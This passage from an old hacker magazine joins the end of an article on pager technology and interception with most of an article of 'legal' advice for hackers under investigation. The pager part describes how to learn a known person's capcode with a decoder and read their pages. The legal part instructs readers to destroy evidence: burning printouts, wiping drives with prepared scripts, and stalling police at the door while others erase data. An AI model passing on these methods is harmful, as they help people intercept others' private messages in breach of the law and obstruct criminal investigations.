the service provider. PIN numbers have no other relationship
|
|||
|
to the capcode.
|
|||
|
|
|||
|
Tone pagers are by far the most limited paging devices in use.
|
|||
|
When a specified number has been called, an address only message
|
|||
|
is broadcast, which causes the intended receiver to beep. Wow.
|
|||
|
Tone pagers usually have 4 capcodes, which can correspond to
|
|||
|
different locations to call back. Voice pagers are similar, except
|
|||
|
they allow the calling party to leave a 15 to 30 second message.
|
|||
|
The voice message is broadcast immediately after the capcode of the
|
|||
|
receiver, which unsquelches the device's audio.
|
|||
|
|
|||
|
Numeric pagers, although seemingly limited by their lack of display
|
|||
|
options have proven otherwise by enterprising users. Most numeric
|
|||
|
data sent is obviously related to phone numbers, but numerous users
|
|||
|
have developed codes relating to various actions to be carried out
|
|||
|
by the party being paged. The most prolific users of this have
|
|||
|
been the Chinese who have one of the most active paging networks
|
|||
|
in the world. I suppose the next biggest users of code-style numeric
|
|||
|
paging would be drug dealers. (2112 0830 187 -- get to the fucking
|
|||
|
drop site by 8:30 or I'll bust a cap in your ass!) :)
|
|||
|
|
|||
|
Alphanumeric pagers are most often contacted through a dedicated
|
|||
|
service that will manually enter in the message to be sent onto the
|
|||
|
paging terminal. One such service, NDC, offers its phone-answering
|
|||
|
and message typing services to various pager companies. Next time
|
|||
|
you are talking to a pager operator, ask him or her if they are at
|
|||
|
NDC. They probably are.
|
|||
|
|
|||
|
In addition to the capcode, pagers will have an FCC ID number, a serial
|
|||
|
number, and most importantly, the frequency that the device has been
|
|||
|
crystaled for imprinted on the back of the device. Although technology
|
|||
|
exists that would allow pagers to listen on a number of frequencies
|
|||
|
by synthesizing the frequency rather than using a crystal, pager
|
|||
|
manufacturers stick to using crystals to "keep the unit cost down."
|
|||
|
|
|||
|
Pagers may have multiple capcodes by which they can be addressed by.
|
|||
|
Multiple capcodes are most often used when a person has subscribed to
|
|||
|
various services offered by their provider, or when the subscriber is
|
|||
|
part of a group of individuals who will all need to receive the same
|
|||
|
page simultaneously (police, EMTs, etc.).
|
|||
|
|
|||
|
Most low-cost pagers have their capcode stored on the circuit board
|
|||
|
in a PAL. Most paging companies will completely exchange pagers
|
|||
|
rather than remove and reprogram the PAL, so I don't think
|
|||
|
it's worth it for any experimenter to attempt. However, like most
|
|||
|
Motorola devices, many of their paging products can be reprogrammed
|
|||
|
with a special serial cable and software. Reprogramming software
|
|||
|
is usually limited to changing baud rates, and adding capcodes.
|
|||
|
|
|||
|
Additionally, some units can be reprogrammed over the air by the
|
|||
|
service provider. Using a POCSAG feature known as OTP (over the air
|
|||
|
programming) the service provider can instruct the paging receiver to
|
|||
|
add capcodes, remove capcodes, or even shut itself down in the case
|
|||
|
of non-payment.
|
|||
|
|
|||
|
** SERVICES **
|
|||
|
|
|||
|
With the growing popularity of alphanumeric pagers, many service providers
|
|||
|
have decided to branch out into the information business. The most
|
|||
|
common of these services is delivery of news headlines. Other services
|
|||
|
include stock quotes, airline flight information, voice mail and
|
|||
|
fax reception notification, and email. Of course, all of these services
|
|||
|
are available for a small additional monthly premium.
|
|||
|
|
|||
|
Email is probably the single coolest thing to have sent to your
|
|||
|
alpha pager. (Unless you subscribe to about a zillion mailing lists)
|
|||
|
Companies like SkyTel and Radiomail give the user an email address
|
|||
|
that automatically forwards to your paging device.
|
|||
|
IE: PIN-NUMBER@skymail.com. Several packages exist for forwarding
|
|||
|
email from a UNIX system by sending stripping down the email to
|
|||
|
pertinent info such as FROM and SUBJECT lines, and executing a script
|
|||
|
to send the incoming mail out via a pager terminal data port.
|
|||
|
One such program is IXOBEEPER, which can be found with an archie
|
|||
|
query.
|
|||
|
|
|||
|
Radiomail's founder, (and rather famous ex-hacker in his own right - go
|
|||
|
look at ancient ComputerWorld headlines), Geoff Goodfellow had devised
|
|||
|
such a method back in the late 70's. His program watched for incoming
|
|||
|
email, parsed the mail headers, and redirected the FROM and SUBJECT
|
|||
|
lines to his alphanumeric pager. Obviously, not many people had
|
|||
|
alphanumeric pagers at all, much less email addresses on ARPANET
|
|||
|
back in the 70's, so Geoff's email pager idea didn't see much
|
|||
|
wide-spread use until much later.
|
|||
|
|
|||
|
Two RFC's have been issued recently regarding paging and the Internet.
|
|||
|
RFC 1568, the Simple Network Paging Protocol, acts similarly to SMTP.
|
|||
|
Upon connecting to the SNPP port the user issues commands such as:
|
|||
|
|
|||
|
PAGE followed by pager telephone number
|
|||
|
MESS followed by the alpha or numeric message
|
|||
|
SEND
|
|||
|
& QUIT
|
|||
|
|
|||
|
RFC 1568 has met with some opposition in the IETF, who don't consider
|
|||
|
it worthwhile to implement a new protocol to handle paging, since it
|
|||
|
can be handled easily using other methods.
|
|||
|
|
|||
|
The other RFC, number 1569, suggests that paging be addressed in a rather
|
|||
|
unique manner. Using the domain TPC.INT, which would be reserved for
|
|||
|
services that necessitate the direct connection to The Phone Company,
|
|||
|
individual pagers would be addressed by their individual phone numbers.
|
|||
|
Usernames would be limited to pager-alpha or pager-numeric to represent
|
|||
|
the type of pager being addressed. For example, an alpha-page being sent to
|
|||
|
1-800-555-1212 would be sent as pager-alpha@2.1.2.1.5.5.5.0.0.8.1.tcp.int.
|
|||
|
|
|||
|
** PAGING TERMINAL DATA PORTS **
|
|||
|
|
|||
|
Many services offer modem connections to pager terminals so that
|
|||
|
computer users can send pages from their desks using software packages
|
|||
|
like WinBeep, Notify! or Messenger. All of these services connect to
|
|||
|
the pager terminal and speak to it using a protocol known as
|
|||
|
IXO.
|
|||
|
|
|||
|
Upon connection, a pager terminal identifies itself with the following:
|
|||
|
|
|||
|
ID=
|
|||
|
|
|||
|
(I bet you always wondered what the hell those systems were)
|
|||
|
Paging terminals default to 300 E71, although many larger companies
|
|||
|
now have dialups supporting up to 2400.
|
|||
|
|
|||
|
Many such systems allow you to manually enter in the appropriate information
|
|||
|
by typing a capital "M" and a return at the ID= prompt. The system will then
|
|||
|
prompt you for the PIN of the party you wish to page, followed by a prompt
|
|||
|
for the message you wish to send, followed by a final prompt asking if you
|
|||
|
wish to send more pages. Not every pager terminal will support a manual
|
|||
|
entry, but most do.
|
|||
|
|
|||
|
All terminals support the IXO protocol. As there are far too many
|
|||
|
site specific examples within the breadth of IXO, we will concentrate on
|
|||
|
the most common type of pager services for our examples.
|
|||
|
|
|||
|
[ Sample IXO transaction of a program sending the message ABC to PIN 123
|
|||
|
gleened from the IXOBeeper Docs ]
|
|||
|
|
|||
|
Pager Terminal YOU
|
|||
|
--------------------------------------------------------------
|
|||
|
<CR>
|
|||
|
ID=
|
|||
|
<ESC>PG1<CR>
|
|||
|
Processing - Please Wait
|
|||
|
<CR>
|
|||
|
<CR>
|
|||
|
ACK <CR>
|
|||
|
<ESC>[p <CR>
|
|||
|
<STX>123<CR>
|
|||
|
ABC<CR>
|
|||
|
<ETX>17;<CR>
|
|||
|
<CR>
|
|||
|
ACK <CR>
|
|||
|
<EOT><CR>
|
|||
|
<ESC>EOT <CR>
|
|||
|
|
|||
|
|
|||
|
The checksum data came from:
|
|||
|
|
|||
|
STX 000 0010
|
|||
|
1 011 0001
|
|||
|
2 011 0010
|
|||
|
3 001 0011
|
|||
|
<CR> 000 1101
|
|||
|
A 100 0001
|
|||
|
B 100 0010
|
|||
|
C 100 0011
|
|||
|
<CR> 000 1101
|
|||
|
ETX 000 0011
|
|||
|
----------------
|
|||
|
1 0111 1011
|
|||
|
----------------
|
|||
|
1 7 ; Get it? Get an ASCII chart and it will all make sense.
|
|||
|
|
|||
|
|
|||
|
Note: Everything in the paging blocks, from STX to ETX inclusive are used
|
|||
|
to generate the checksum. Also, this is binary data, guys...you can't
|
|||
|
just type at the ID= prompt and expect to have it recognized as IXO.
|
|||
|
It wants specific BITS. Got it? Just checking...
|
|||
|
|
|||
|
|
|||
|
** PAGER FREQUENCIES - US **
|
|||
|
|
|||
|
[Frequencies transmitting pager information are extremely easy to
|
|||
|
identify while scanning. They identify each batch transmission
|
|||
|
with a two-tone signal, followed by bursts of data. People with
|
|||
|
scanners may tune into some of the following frequencies to
|
|||
|
familiarize themselves with this distinct audio.]
|
|||
|
|
|||
|
Voice Pager Ranges: 152.01 - 152.21
|
|||
|
453.025 - 453.125
|
|||
|
454.025 - 454.65
|
|||
|
462.75 - 462.925
|
|||
|
|
|||
|
Other Paging Ranges: 35.02 - 35.68
|
|||
|
43.20 - 43.68
|
|||
|
152.51 - 152.84
|
|||
|
157.77 - 158.07
|
|||
|
158.49 - 158.64
|
|||
|
459.025 - 459.625
|
|||
|
929.0125 - 931.9875
|
|||
|
|
|||
|
** PAGER FREQUENCIES - WORLD **
|
|||
|
|
|||
|
Austria 162.050 - 162.075 T,N,A
|
|||
|
Australia 148.100 - 166.540 T,N,A
|
|||
|
411.500 - 511.500 T,N,A
|
|||
|
Canada 929.025 - 931-975 T,N,A
|
|||
|
138.025 - 173.975 T,N,A
|
|||
|
406.025 - 511.975 T,N,A
|
|||
|
China 152.000 - 172.575 N,A
|
|||
|
Denmark 469.750 N,A
|
|||
|
Finland 450.225 T,N,A
|
|||
|
146.275 - 146.325 T,N,A
|
|||
|
France 466.025 - 466.075 T,N,A
|
|||
|
Germany 465.970 - 466.075 T,N,A
|
|||
|
173.200 T,N,A
|
|||
|
Hong Kong 172.525 N,A
|
|||
|
280.0875 T,N,A
|
|||
|
Indonesia 151.175 - 153.050 A
|
|||
|
Ireland 153.000 - 153.825 T,N,A
|
|||
|
Italy 466.075 T,N,A
|
|||
|
161.175 T,N
|
|||
|
Japan 278.1625 - 283.8875 T,N
|
|||
|
Korea 146.320 - 173.320 T,N,A
|
|||
|
Malaysia 152.175 - 172.525 N,A,V
|
|||
|
931.9375 N,A
|
|||
|
Netherlands 156.9865 - 164.350 T,N,A
|
|||
|
New Zealand 157.925 - 158.050 T,N,A
|
|||
|
Norway 148.050 - 169.850 T,N,A
|
|||
|
Singapore 161.450 N,A
|
|||
|
931.9375 N,A
|
|||
|
Sweden 169.8 T,N,A
|
|||
|
Switzerland 149.5 T,N,A
|
|||
|
Taiwan 166.775 N,A
|
|||
|
280.9375 N,A
|
|||
|
Thailand 450.525 N,A
|
|||
|
172.525 - 173.475 N,A
|
|||
|
UK 138.150 - 153.275 T,N,A
|
|||
|
454.675 - 466.075 T,N,A
|
|||
|
|
|||
|
T = Tone
|
|||
|
N = Numeric
|
|||
|
A = Alphanumeric
|
|||
|
V = Voice
|
|||
|
|
|||
|
|
|||
|
** INTERCEPTION AND THE LAW **
|
|||
|
|
|||
|
For many years the interception of pages was not considered an
|
|||
|
invasion of privacy because of the limited information provided
|
|||
|
by the tone-only pagers in use at the time. In fact, when
|
|||
|
Congress passed the Electronic Communications Privacy Act in 1986
|
|||
|
tone-only pagers were exempt from its provisions.
|
|||
|
|
|||
|
According to the ECPA, monitoring of all other types of paging signals,
|
|||
|
including voice, is illegal. But, due to this same law, paging
|
|||
|
transmissions are considered to have a reasonable expectation to
|
|||
|
privacy, and Law Enforcement officials must obtain a proper court
|
|||
|
order to intercept them, or have the consent of the subscriber.
|
|||
|
|
|||
|
To intercept pages, many LE-types will obtain beepers programmed with
|
|||
|
the same capcode as their suspect. To do this, they must contact
|
|||
|
the paging company and obtain the capcode associated with the person
|
|||
|
or phone number they are interested in. However, even enlisting
|
|||
|
the assistance of the paging companies often requires following
|
|||
|
proper legal procedures (warrants, subpoenas, etc.).
|
|||
|
|
|||
|
More sophisticated pager-interception devices are sold by a variety
|
|||
|
of companies. SWS Security sells a device called the "Beeper Buster"
|
|||
|
for about $4000.00. This particular device is scheduled as
|
|||
|
a Title III device, so any possession of it by someone outside
|
|||
|
a law enforcement agency is a federal crime. Greyson Electronics
|
|||
|
sells a package called PageTracker that uses an ICOM R7100
|
|||
|
in conjunction with a personal computer to track and decode pager
|
|||
|
messages. (Greyson also sells a similar package to decode
|
|||
|
AMPS cellular messages from forward and reverse channels called
|
|||
|
"CellScope.")
|
|||
|
|
|||
|
For the average hacker-type, the most realistic and affordable option
|
|||
|
is the Universal M-400 decoder. This box is about 400 bucks and
|
|||
|
will decode POCSAG at 512 and 1200, as well as GOLAY (although I've never
|
|||
|
seen a paging service using GOLAY.) It also decodes CTCSS, DCS, DTMF,
|
|||
|
Baudot, ASCII, SITOR A & B, FEC-A, SWED-ARQ, ACARS, and FAX. It
|
|||
|
takes audio input from any scanners external speaker jack, and
|
|||
|
is probably the best decoder available to the Hacker/HAM for the price.
|
|||
|
|
|||
|
Output from the M400 shows the capcode followed by T, N or A (tone, numeric
|
|||
|
or alpha) ending with the message sent. Universal suggests hooking
|
|||
|
the input to the decoder directly to the scanner before any de-emphasis
|
|||
|
circuitry, to obtain the true signal. (Many scanners alter the audio
|
|||
|
before output for several reasons that aren't really relevant to this
|
|||
|
article...they just do. :) )
|
|||
|
|
|||
|
Obviously, even by viewing the pager data as it streams by is of little
|
|||
|
use to anyone without knowing to whom the pager belongs to. Law Enforcement
|
|||
|
can get a subpoena and obtain the information easily, but anyone else
|
|||
|
is stuck trying to social engineer the paging company. One other alternative
|
|||
|
works quite well when you already know the individuals pager number,
|
|||
|
and need to obtain the capcode (for whatever reason).
|
|||
|
|
|||
|
Pager companies will buy large blocks in an exchange for their customers.
|
|||
|
It is extremely easy to discover the paging company from the phone number
|
|||
|
that corresponds to the target pager either through the RBOC or by paging
|
|||
|
someone and asking them who their provider is when they return your call.
|
|||
|
Once the company is known, the frequencies allocated to that company
|
|||
|
are registered with the FCC and are public information. Many CD-ROMs
|
|||
|
are available with the entire FCC Master Frequency Database.
|
|||
|
(Percon sells one for 99 bucks that covers the whole country -
|
|||
|
716-386-6015) Libraries and the FCC itself will also have this information
|
|||
|
available.
|
|||
|
|
|||
|
With the frequency set and a decoder running, send a page that will be
|
|||
|
incredibly easy to discern from the tidal wave of pages spewing
|
|||
|
forth on the frequency. (6666666666, THIS IS YOUR TEST PAGE, etc...)
|
|||
|
It will eventually scroll by, and presto! How many important people
|
|||
|
love to give you their pager number?
|
|||
|
|
|||
|
** THE FUTURE **
|
|||
|
|
|||
|
With the advent of new technologies pagers will become even more
|
|||
|
present in both our businesses and private lives. Notebook computers
|
|||
|
and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards.
|
|||
|
Some of these cards have actual screens that allow for use without the
|
|||
|
computer, but most require a program to pull message data out. These
|
|||
|
cards also have somewhat large storage capacity, so the length of
|
|||
|
messages have the option of being fairly large, should the service
|
|||
|
provider allow them to be.
|
|||
|
|
|||
|
With the advent of 8-bit alphanumeric services, users with PCMCIA pagers
|
|||
|
can expect to receive usable computer data such as spreadsheet
|
|||
|
entries, word processing documents, and of course, GIFs. (Hey, porno
|
|||
|
entrepreneurs: beeper-porn! Every day, you get a new gif sent to your
|
|||
|
pagecard! Woo Woo. Sad thing is, it would probably sell.)
|
|||
|
|
|||
|
A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A
|
|||
|
Roaming Computer) was one of the first to allow for such broadcasts.
|
|||
|
EMBARC makes use of a proprietary Motorola protocol, rather than
|
|||
|
POCSAG, so subscribers must make use of either a Motorola NewsStream
|
|||
|
pager (with nifty serial cable) or a newer PCMCIA pager. Messages are
|
|||
|
sent to (and received by) the user through the use of special client
|
|||
|
software.
|
|||
|
|
|||
|
The software dials into the EMBARC message switch accessed through
|
|||
|
AT&T's ACCUNET packet-switched network. The device itself is used
|
|||
|
for authentication (most likely its capcode or serial number)
|
|||
|
and some oddball protocol is spoken to communicate with the switch.
|
|||
|
|
|||
|
Once connected, users have the option of sending a page out, or
|
|||
|
retrieving pages either too large for the memory of the pager, or
|
|||
|
from a list of all messages sent in the last 24 hours, in case the
|
|||
|
subscriber had his pager turned off.
|
|||
|
|
|||
|
Additionally, the devices can be addressed directly via x.400
|
|||
|
addresses. (X.400: The CCITT standard that covers email address
|
|||
|
far too long to be worth sending anyone mail to.) So essentially,
|
|||
|
any EMBARC customer can be contacted from the Internet.
|
|||
|
|
|||
|
MTEL, the parent company of the huge paging service SkyTel, is
|
|||
|
implementing what may be the next generation of paging technologies.
|
|||
|
This service, NWN, being administrated by MTEL subsidiary Destineer,
|
|||
|
is most often called 2-way paging, but is more accurately Narrowband-PCS.
|
|||
|
|
|||
|
The network allows for the "pager" to be a transceiver. When a page
|
|||
|
arrives, the device receiving the page will automatically send back
|
|||
|
an acknowledgment of its completed reception. Devices may also
|
|||
|
send back some kind of "canned response" the user programs. An example
|
|||
|
might be: "Thanks, I got it!" or "Why on Earth are you eating up my
|
|||
|
allocated pages for the month with this crap?"
|
|||
|
|
|||
|
MTEL's service was awarded a Pioneers Preference by the FCC, which gave them
|
|||
|
access to the narrowband PCS spectrum before the auctions. This is a big
|
|||
|
deal, and did not go unnoticed by Microsoft. They dumped cash into the
|
|||
|
network, and said the devices will be supported by Chicago. (Yeah,
|
|||
|
along with every other device on the planet, right? Plug and Pray!)
|
|||
|
|
|||
|
The network will be layed out almost identically to MTEL's existing paging
|
|||
|
network, using dedicated lines to connect towers in an area to a central
|
|||
|
satellite up/downlink. One key difference will be the addition of
|
|||
|
highly somewhat sensitive receivers on the network, to pick up the ACKs
|
|||
|
and replies of the customer units, which will probably broadcast at
|
|||
|
about 2 or 3 watts. The most exciting difference will be the
|
|||
|
speed at which the network transmits data: 24,000 Kbps. Twenty-four
|
|||
|
thousand. (I couldn't believe it either. Not only can you get your
|
|||
|
GIFs sent to your pager, but you get them blinding FAST!) The actual
|
|||
|
units themselves will most likely look like existing alphanumeric pagers
|
|||
|
with possibly a few more buttons, and of course, PCMCIA units will
|
|||
|
be available to integrate with computer applications.
|
|||
|
|
|||
|
Beyond these advancements, other types of services plan on offering
|
|||
|
paging like features. CDPD, TDMA & CDMA Digital Cellular and ESMR
|
|||
|
all plan on providing a "pager-like" option for their customers.
|
|||
|
The mere fact that you can walk into a K-Mart and buy a pager
|
|||
|
off a rack would indicate to me that pagers are far to ingrained into
|
|||
|
our society, and represent a wireless technology that doesn't scare
|
|||
|
or confuse the yokels. Such a technology doesn't ever really go away.
|
|||
|
|
|||
|
|
|||
|
** BIBLIOGRAPHY **
|
|||
|
|
|||
|
Kneitel, Tom, "The Secret Life of Beepers," _Popular Communications_,
|
|||
|
p. 8, July, 1994.
|
|||
|
|
|||
|
O'Brien, Michael, "Beep! Beep! Beep!," _Sun Expert_, p. 17, March, 1994.
|
|||
|
|
|||
|
O'Malley, Chris, "Pagers Grow Up," _Mobile Office_, p. 48, August, 1994.
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 9 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
Legal Info
|
|||
|
by Szechuan Death
|
|||
|
|
|||
|
OK. This document applies only to United States citizens: if
|
|||
|
you are a citizen of some other fascist country, don't come whining
|
|||
|
to me when this doesn't work..... :)
|
|||
|
|
|||
|
Make no mistake: I'm not a lawyer. I've merely paid
|
|||
|
attention and picked up some facts that might be useful to me along
|
|||
|
the way. There are three subjects that it pays to have a knowledge
|
|||
|
of handy: prescription drugs, medical procedures, and legal facts.
|
|||
|
While these may all be boring as hell, they can certainly pull your
|
|||
|
ass out of the fire in a pinch.
|
|||
|
|
|||
|
Standard disclaimer: I make no claims about this document or
|
|||
|
facts contained therein. I also make no claims about their legal
|
|||
|
authenticity: if you want to be 100% sure, there's a library in
|
|||
|
damn near every town, LOOK IT UP!
|
|||
|
|
|||
|
One more thing: This document is useful for virtually
|
|||
|
ANYTHING. It's effectiveness stretches far beyond computer hacking
|
|||
|
(although it's worn a bit thin for serious crimes, as every cretin
|
|||
|
on Death Row has tried it already.....:)
|
|||
|
|
|||
|
OK. Let's say, just for the sake of argument, that you've
|
|||
|
decided to take a walk along the wild side and do something
|
|||
|
illegal. For our purposes, let's say computer hacking (imagine
|
|||
|
that). There are many things you can do cover your legal ass,
|
|||
|
should your activities come to the attention of any of our various
|
|||
|
friendly law-enforcement agencies nationwide.
|
|||
|
|
|||
|
|
|||
|
-- Part 1: Police Mentality
|
|||
|
|
|||
|
You must understand the police, if you ever want to be able to
|
|||
|
thwart them and keep your freedom. Most police, to survive in
|
|||
|
their jobs, have developed an "Us vs. Them" attitude, which we
|
|||
|
should tolerate (up to a point). They use this attitude to justify
|
|||
|
their fascist tactics. "Us" is the police, a brotherhood that
|
|||
|
keeps the peace, always does right, and never snitches on each
|
|||
|
other, no matter what the cause. "Them" is the rest of the
|
|||
|
population. If "They" are not guilty of a specific crime, they
|
|||
|
must have done something else, and they're doing their damndest to
|
|||
|
avoid getting caught. In addition, many police have cultivated an
|
|||
|
attitude similar to that of a 15-year-old high school punk: "I'm
|
|||
|
bad, I'm bad, I'm SOOOOO bad, I Am Cop, Hear Me ROAR," etc.
|
|||
|
Unfortunately, these people have weapons and the authority to
|
|||
|
support that attitude. Therefore, if the police come to your
|
|||
|
house, be EXTREMELY polite and subservient; now is not the time to
|
|||
|
start spouting your opinion about the police state in America
|
|||
|
today. Also, DO NOT RESIST THEM IF THEY ARREST YOU. Besides
|
|||
|
adding a charge of "Resisting Arrest" and/or "Assaulting an
|
|||
|
Officer", it can get very dangerous. The police have been trained
|
|||
|
in a number of suspect-control techniques, most of which involve
|
|||
|
twisting body parts at unnatural angles. As if this weren't
|
|||
|
enough, almost all police carry guns. Start fighting and you'll
|
|||
|
get a couple broken bones, torn ligaments, or worse, a few bullet
|
|||
|
wounds (possibly fatal). So remember, be very meek. Show them
|
|||
|
that you are cowed by their force and their blustering presence,
|
|||
|
and this will save you a black eye or two on the way down to the
|
|||
|
station (from tripping and falling, of course).
|
|||
|
|
|||
|
-- Part 2: Hacker's Security
|
|||
|
|
|||
|
CARDINAL RULE #1: Get rid of the evidence. No evidence = no
|
|||
|
case for the prosecutor. The Novice Hacker's Guide from LOD has an
|
|||
|
excellent way to put this:
|
|||
|
|
|||
|
VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the law.
|
|||
|
It doesn't hurt to store everything encrypted on your hard disk, or
|
|||
|
keep your notes buried in the backyard or in the trunk of your car. You
|
|||
|
may feel a little funny, but you'll feel a lot funnier when you when you
|
|||
|
meet Bruno, your transvestite cellmate who axed his family to death.
|
|||
|
|
|||
|
Basic hints:
|
|||
|
Hide all your essential printouts, or burn them if they're trash
|
|||
|
(remember: police need no warrant to search your trash). Encrypt
|
|||
|
the files on your hard drive with something nasty, like PGP or RSA.
|
|||
|
Use a file-wiper, NOT delete, to get rid of them when you're done.
|
|||
|
And WIPE, don't FORMAT, your floppies and other magnetic media
|
|||
|
(better still, degauss them). With a little common sense and a bit
|
|||
|
of effort, a great deal of legal headaches can be avoided.
|
|||
|
|
|||
|
|
|||
|
-- Part 3A: Polite Entry
|
|||
|
|
|||
|
Next part. You and your friends are enjoying an evening of
|
|||
|
trying to polevault the firewall on whitehouse.com, when suddenly
|
|||
|
you hear a knock at the door. Opening the door, you find a member
|
|||
|
of the local police force standing outside, asking if he can come
|
|||
|
in and ask you some questions. Now, here's where you start to piss
|
|||
|
your pants. If you were smart, you'll have arranged something
|
|||
|
beforehand where your friends (or, if there ARE no friends present,
|
|||
|
an automatic script) are getting rid of the evidence as shown in
|
|||
|
part 2. If you have no handy means of destroying the data
|
|||
|
(printouts, floppies, tapes, etc.), throw the whole mess into
|
|||
|
the bathtub, soak it in lighter fluid, and torch it. It's a
|
|||
|
helluva mess to clean up, but nothing compared to latrine duty at
|
|||
|
your nearest federal prison.
|
|||
|
|
|||
|
While the evidence is being destroyed, you're stalling the
|
|||
|
police. Ask to see their search warrant and IDs. Mull over each
|
|||
|
and every one of them for at least 5 minutes. If they have none,
|
|||
|
start screaming about your 4th Amendment rights. Most importantly:
|
|||
|
DON'T INVITE THEM IN. They're like vampires: if you let them in,
|
|||
|
you're fucked. If they see anything even REMOTELY incriminating,
|
|||
|
that constitutes probable cause for a search and they'll be
|
|||
|
swarming all over your house like flies on shit. (And guess what!
|
|||
|
It's legal, because YOU LET THEM IN!) Now, be aware that this
|
|||
|
won't stall them forever: they can simply wait outside the house
|
|||
|
and radio in a request for a search warrant, which will probably be
|
|||
|
signed by the judge on duty at that time. Remember: "If you're
|
|||
|
not willing to be searched, you MUST have something to hide!" If
|
|||
|
there are no friends assisting you, as shown above, USE THIS TIME
|
|||
|
EFFECTIVELY. When they get the warrant signed, that will be too
|
|||
|
late, because you'll have erased/shredded/burned/hidden/etc. all
|
|||
|
the incriminating evidence.
|
|||
|
|
|||
|
|
|||
|
-- Part 3B: And Suddenly, The Door Burst In
|
|||
|
|
|||
|
Now, if the police already have a search warrant, they don't
|
|||
|
need to knock on the door. They can simply kick the door down and
|
|||
|
waltz in. If you're there at the time, you CAN try and stall them
|
|||
|
as shown above, by asking to see their search warrant and IDs.
|
|||
|
This may not work now, because they have you cold, hard, and dead
|
|||
|
to rights. And, if anything incriminating is in a place where they
|
|||
|
can find it, you're fucked, because it WILL be used as evidence.
|
|||
|
But this won't happen to you, because you've already put everything
|
|||
|
you're not using right at the moment in a safe, HIDDEN, place.
|
|||
|
Right?
|
|||
|
|
|||
|
This leaves the computer. If you hear them kicking the door
|
|||
|
in, keep calm, and run a script you've set up beforehand to low-
|
|||
|
level-format the drive, wipe all hacking files, encrypt the whole
|
|||
|
thing, etc. If there's any printouts or media hanging out, try and
|
|||
|
hide them (probably worthless anyway, but worth a try). The name
|
|||
|
of the game now is to minimize the damage that can be done to you.
|
|||
|
The less hard evidence linking you to the "crime", the less of a
|
|||
|
case the prosecutor will have and the better off you'll be.
|
|||
|
|
|||
|
|
|||
|
-- Part 4: The Arrest
|
|||
|
|
|||
|
Now is the time to kick all your senses into hyper-record
|
|||
|
mode. For you to get processed through the system without a hitch,
|
|||
|
the arrest has to go perfectly, by the numbers. One small slip and
|
|||
|
you're out through a loophole. Now, the police are aware of this
|
|||
|
and will be doing their best to see that doesn't happen, but you
|
|||
|
may get lucky all the same. First of all: According to the
|
|||
|
Miranda Act, the police are REQUIRED BY LAW to read you your rights
|
|||
|
and make sure you understand them. Remember EVERY WORD THEY SAY TO
|
|||
|
YOU. If they don't say it correctly, you may be able to get off on
|
|||
|
a technicality.
|
|||
|
|
|||
|
CARDINAL RULE #2: You have the right to remain silent.
|
|||
|
EXERCISE IT. This cannot be stressed enough. If you need a
|
|||
|
reminder, listen to the first part of the Miranda Warning:
|
|||
|
|
|||
|
"You have the right to remain silent. If you give up that
|
|||
|
right, ANYTHING YOU SAY CAN AND WILL BE USED AGAINST YOU IN A COURT
|
|||
|
OF LAW."
|
|||
|
|
|||
|
Nice ring to it, hmm? The only words coming out of your mouth
|
|||
|
at this point should be "I'd like to speak to my attorney, please"
|
|||
|
and, if applicable in your area, "I'd like to make a phone call,
|
|||
|
please" (remember the "please's," see part #1 above) Nothing
|
|||
|
else. There are tape recorders, video cameras, PLUS the word of a
|
|||
|
dozen police officers to back it all up. How's that for an array
|
|||
|
of damning evidence against you?
|
|||
|
|
|||
|
Then, after the ride downtown, you'll be booked and probably
|
|||
|
asked a few questions. Say nothing. You're probably pissing your
|
|||
|
pants with fear at this point, and may be tempted to roll over on
|
|||
|
everyone you ever shook hands with in your whole life, but keep
|
|||
|
your calm, and KEEP QUIET. Keep asking for your attorney and/or a
|
|||
|
phone call, no matter WHAT threats/deals/etc. they make to you.
|
|||
|
Remember, they can't legally interrogate you without your attorney
|
|||
|
present. You may also be tempted to show your mettle at this
|
|||
|
point, and give them false information, but remember one thing: If
|
|||
|
you lie to them, you can be convicted of perjury (a nasty offense
|
|||
|
itself). The best policy here is NSA: Never Say Anything.
|
|||
|
Remember, you never have to keep track of what you've said, or have
|
|||
|
to worry about having it used against you, if you've said NOTHING.
|
|||
|
|
|||
|
|
|||
|
-- Part 5: The Trial
|
|||
|
|
|||
|
Here, we'll assume you've been arrested, booked, let out on
|
|||
|
bail, indicted on X counts of so-and-so, etc. You're now in the
|
|||
|
system. CARDINAL RULE #3: Get the best criminal defense attorney
|
|||
|
you can afford, preferably one with some background in the crime
|
|||
|
you've committed. No, scratch that: make that the best criminal
|
|||
|
defense attorney, PERIOD. It's a helluva lot better to spend 5
|
|||
|
years working at McDonald's 12 hours a day to pay back your legal
|
|||
|
fee, than it is to spend 5 years in the slammer getting pimped out
|
|||
|
nightly for a pack of menthols. Also, pay attention during the
|
|||
|
trial. Remember, the defense attorney is working for YOU: it's
|
|||
|
YOUR life they're deciding, so give him every bit of information
|
|||
|
and help you can. You're paying him to sort it out for you, but
|
|||
|
you should still keep an eye on things: if, in the middle of a
|
|||
|
trial, something happens (you get a killer idea, or want to jump up
|
|||
|
and scream "BULLSHIT!"), TELL HIM! It very well might be useful!
|
|||
|
Also, have him nitpick every single thing for loopholes,
|
|||
|
technicalities, civil rights violations, etc. It's worth it if it
|
|||
|
pays off.
|
|||
|
|
|||
|
Another important thing is to look good. Image is everything.
|
|||
|
Although you might prefer to wear heavily stained rock-band T-
|
|||
|
shirts, leather jackets, ratty jeans, etc. in real life, that will
|
|||
|
be EXTREMELY damning in the eyes of the judge/jury. They say that
|
|||
|
clothes make the man, and in this case it's REALLY true: get a
|
|||
|
suit, comb/cut your hair, shave, etc. Make yourself look like a
|
|||
|
"positively respectable darling" in the eyes of the court! It'll
|
|||
|
pay off for you. (hey, it worked for Eric and Lyle Menendez)
|
|||
|
|
|||
|
|
|||
|
-- Part 8: The Prison
|
|||
|
|
|||
|
If you're here, you're totally fucked. Unless, by divine
|
|||
|
intervention, your conviction is overturned on appeal, you'd better
|
|||
|
clear up the next 5 years on your calendar. Apparently, you didn't
|
|||
|
read closely enough, so read this every day during your long stay
|
|||
|
in prison, and you'll be better equipped next time (assuming there
|
|||
|
IS a next time..... :)
|
|||
|
|
|||
|
|
|||
|
Remember the cardinal rules: 1) Don't leave evidence around
|
|||
|
to be found. 2) KEEP CALM AND KEEP QUIET. 3) Get the best
|
|||
|
attorney available. If you remember these, and exercise some common
|
|||
|
